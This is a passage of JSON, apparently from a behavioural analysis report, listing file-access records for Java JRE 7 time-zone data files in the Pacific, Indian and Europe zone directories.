(x86)\\Java\\jre7\\lib\\zi\\Pacific\\Gambier", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\gambier", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Guadalcanal.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\guadalcanal.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Guadalcanal", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\guadalcanal", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Guam.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\guam.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Guam", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\guam", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Honolulu.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\honolulu.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Honolulu", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\honolulu", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kiritimati.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\kiritimati.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kiritimati", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\kiritimati", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kosrae.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\kosrae.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kosrae", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\kosrae", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kwajalein.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\kwajalein.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kwajalein", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\kwajalein", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Majuro.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\majuro.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Majuro", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\majuro", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Marquesas.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\marquesas.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Marquesas", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\marquesas", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Midway.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\midway.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Midway", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\midway", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Nauru.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\nauru.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Nauru", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\nauru", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Niue.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\niue.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Niue", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\niue", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Norfolk.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\norfolk.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Norfolk", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\norfolk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Noumea.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\noumea.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Noumea", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\noumea", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pago_Pago.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\pago_pago.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pago_Pago", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\pago_pago", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Palau.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\palau.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Palau", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\palau", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pitcairn.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\pitcairn.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pitcairn", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\pitcairn", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pohnpei.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\pohnpei.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pohnpei", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\pohnpei", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Port_Moresby.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\port_moresby.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Port_Moresby", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\port_moresby", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Rarotonga.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\rarotonga.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Rarotonga", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\rarotonga", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Saipan.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\saipan.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Saipan", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\saipan", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tahiti.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\tahiti.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tahiti", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\tahiti", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tarawa.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\tarawa.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tarawa", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\tarawa", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tongatapu.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\tongatapu.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tongatapu", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\tongatapu", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Wake.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\wake.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Wake", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\wake", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Wallis.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\wallis.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Wallis", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\wallis", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Antananarivo.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\antananarivo.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Antananarivo", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\antananarivo", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Chagos.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\chagos.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Chagos", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\chagos", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Christmas.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\christmas.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Christmas", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\christmas", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Cocos.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\cocos.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Cocos", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\cocos", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Comoro.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\comoro.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Comoro", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\comoro", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Kerguelen.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\kerguelen.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Kerguelen", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\kerguelen", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mahe.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\mahe.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mahe", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\mahe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Maldives.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\maldives.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Maldives", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\maldives", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mauritius.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\mauritius.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mauritius", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\mauritius", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mayotte.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\mayotte.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mayotte", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\mayotte", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Reunion.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\reunion.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Reunion", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\reunion", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Amsterdam.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\amsterdam.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Amsterdam", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\amsterdam", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Andorra.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\andorra.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Andorra", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\andorra", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Athens.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\athens.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Athens", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\athens", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Belgrade.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\belgrade.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Belgrade", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\belgrade", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Berlin.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\berlin.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Berlin", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\berlin", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Brussels.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\brussels.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Brussels", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\brussels", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Bucharest.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\bucharest.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Bucharest", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\bucharest", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Budapest.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\budapest.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Budapest", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\budapest", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Chisinau.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\chisinau.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Chisinau", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\chisinau", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Copenhagen.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\copenhagen.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Copenhagen", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\copenhagen", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Dublin.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\dublin.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Dublin", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\dublin", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Gibraltar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\gibraltar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Gibraltar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\gibraltar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Helsinki.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\helsinki.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Helsinki", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\helsinki", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Istanbul.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\istanbul.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Istanbul", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\istanbul", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Kaliningrad.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\kaliningrad.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Kaliningrad", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\kaliningrad", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Kiev.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\kiev.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Kiev", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\kiev", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Lisbon.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\lisbon.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Lisbon", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\lisbon", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\London.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\london.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\London", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\london", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Luxembourg.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\luxembourg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Luxembourg", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\luxembourg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Madrid.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\madrid.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Madrid", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\madrid", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Malta.4035", "hashes": [], 